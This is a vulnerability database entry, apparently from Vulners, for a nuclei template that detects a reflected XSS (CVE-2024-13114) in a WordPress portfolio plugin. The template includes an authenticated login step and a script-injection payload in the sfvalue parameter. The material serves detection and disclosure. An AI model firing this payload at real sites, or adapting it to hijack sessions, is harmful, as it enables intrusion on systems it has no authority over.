Lucene search
K

WP Projects Portfolio <= 3.0 - Cross-Site Scripting

🗓️ 09 Jul 2026 03:01:09Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 10 Views

Reflected XSS in WP Projects Portfolio <=3.0 allows script execution via crafted URL.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-13114
4 Feb 202506:08
circl
CVE
CVE-2024-13114
4 Feb 202506:00
cve
Cvelist
CVE-2024-13114 WP Projects Portfolio with Client Testimonials <= 3.0 - Reflected XSS
4 Feb 202506:00
cvelist
EUVD
EUVD-2024-51354
3 Oct 202520:07
euvd
NVD
CVE-2024-13114
4 Feb 202506:15
nvd
OSV
CVE-2024-13114
4 Feb 202506:15
osv
Patchstack
WordPress WP Projects Portfolio with Client Testimonials plugin <= 3.0 - Reflected XSS vulnerability
4 Feb 202522:06
patchstack
Positive Technologies
PT-2025-2011
4 Feb 202500:00
ptsecurity
RedhatCVE
CVE-2024-13114
8 Feb 202504:35
redhatcve
Vulnrichment
CVE-2024-13114 WP Projects Portfolio with Client Testimonials <= 3.0 - Reflected XSS
4 Feb 202506:00
vulnrichment
Rows per page
id: CVE-2024-13114

info:
  name: WP Projects Portfolio <= 3.0 - Cross-Site Scripting
  author: Sourabh-Sahu
  severity: medium
  description: |
    WP Projects Portfolio with Client Testimonials WordPress plugin <= 3.0 contains a reflected cross-site scripting caused by unsanitized parameter output, letting attackers execute scripts in the context of high privilege users, exploit requires attacker to craft a malicious URL.
  impact: |
    Attackers can execute arbitrary scripts in the context of high privilege users, potentially leading to session hijacking or privilege escalation.
  remediation: |
    Update to the latest version of the plugin where the issue is fixed.
  reference:
    - https://wpscan.com/vulnerability/0cecda12-590a-42a6-b10b-e0efe7fb3a3a/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-13114
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-13114
    cwe-id: CWE-79
    epss-score: 0.00567
    epss-percentile: 0.42938
    cpe: cpe:2.3:a:phptechie:wp_projects_portfolio_with_client_testimonials:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: phptechie
    product: wp_projects_portfolio_with_client_testimonials
  tags: cve,cve2024,wordpress,wp-plugin,wp-projects-portfolio,xss,authenticated

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, "wordpress_logged_in")
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/edit.php?post_type=wpprojects_portfolio&sfvalue=1"></script><script>alert(document.domain)</script><script>` HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - contains_all(body, "></script><script>alert(document.domain)</script><script>", "wpprojects_portfolio")
          - contains(content_type, "text/html")
          - status_code == 200
        condition: and
# digest: 4a0a00473045022001f9eb6f6c27cb434eb5708de56e10958fd1b6d5341888e4be99d9531dec7a21022100849292506ebf372b8a3cb1580ed0ac83320835d10125c342cb12a4aeab12af97:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Feb 2026 08:37Current
7.1High risk
Vulners AI Score7.1
CVSS 3.16.1
EPSS0.00567
SSVC
10